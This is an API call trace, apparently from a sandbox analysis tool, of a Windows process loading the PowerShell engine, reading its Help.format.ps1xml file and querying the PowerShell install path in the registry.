	[0353.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.528] VirtualQuery (in: lpAddress=0x10b920, lpBuffer=0x10c7e0, dwLength=0x30 | out: lpBuffer=0x10c7e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.528] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xc40e3af, Data2=0xeee3, Data3=0x427d, Data4=([0]=0xa8, [1]=0x97, [2]=0xc, [3]=0x1, [4]=0xb7, [5]=0xbf, [6]=0xfc, [7]=0x81))) returned 0x0
	[0353.528] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.529] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x87fec91f, Data2=0x973e, Data3=0x4b9c, Data4=([0]=0x9f, [1]=0x27, [2]=0x54, [3]=0xeb, [4]=0xf9, [5]=0xec, [6]=0x6b, [7]=0xba))) returned 0x0
	[0353.529] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xfcd27c97, Data2=0x7d7e, Data3=0x48ee, Data4=([0]=0x88, [1]=0x63, [2]=0x41, [3]=0xe4, [4]=0x51, [5]=0xdd, [6]=0xec, [7]=0x80))) returned 0x0
	[0353.529] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x50c8cc28, Data2=0xc07e, Data3=0x43be, Data4=([0]=0xbc, [1]=0x13, [2]=0xe6, [3]=0x3d, [4]=0xbf, [5]=0x69, [6]=0xa5, [7]=0x19))) returned 0x0
	[0353.529] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.529] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0353.529] SetErrorMode (uMode=0x1) returned 0x1
	[0353.529] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0353.530] GetFileType (hFile=0x1cc) returned 0x1
	[0353.530] SetErrorMode (uMode=0x1) returned 0x1
	[0353.530] GetFileType (hFile=0x1cc) returned 0x1
	[0353.530] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.532] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.532] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.532] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.533] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.533] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.533] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.533] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.535] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.536] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.536] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.536] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.536] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.538] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.538] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.538] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.538] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.539] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.539] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.541] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.541] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.541] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.542] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.542] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.542] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.542] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.542] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.543] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.543] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.543] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.543] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.545] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.546] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.696] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.696] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0xf37, lpOverlapped=0x0) returned 1
	[0353.697] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea23b7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea23b7*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0353.698] ReadFile (in: hFile=0x1cc, lpBuffer=0x2ea2d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ea2d18*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0353.698] CloseHandle (hObject=0x1cc) returned 1
	[0353.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0353.698] SetErrorMode (uMode=0x1) returned 0x1
	[0353.698] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0353.698] SetErrorMode (uMode=0x1) returned 0x1
	[0353.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0353.698] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x1cc) returned 0x0
	[0353.698] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0353.699] CoTaskMemAlloc (cb=0x5a) returned 0x3cc550
	[0353.699] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3cc550, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0353.699] CoTaskMemFree (pv=0x3cc550) 
	[0353.699] RegCloseKey (hKey=0x1cc) returned 0x0
	[0353.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0353.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0353.703] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa1f96255, Data2=0xe46e, Data3=0x4002, Data4=([0]=0xb4, [1]=0x38, [2]=0x16, [3]=0xd, [4]=0x2d, [5]=0x35, [6]=0x83, [7]=0xa0))) returned 0x0
	[0353.704] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1cabba70, Data2=0xd9f0, Data3=0x4b43, Data4=([0]=0x8e, [1]=0xfa, [2]=0xa1, [3]=0x34, [4]=0x3b, [5]=0x97, [6]=0xf3, [7]=0xa6))) returned 0x0
	[0353.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
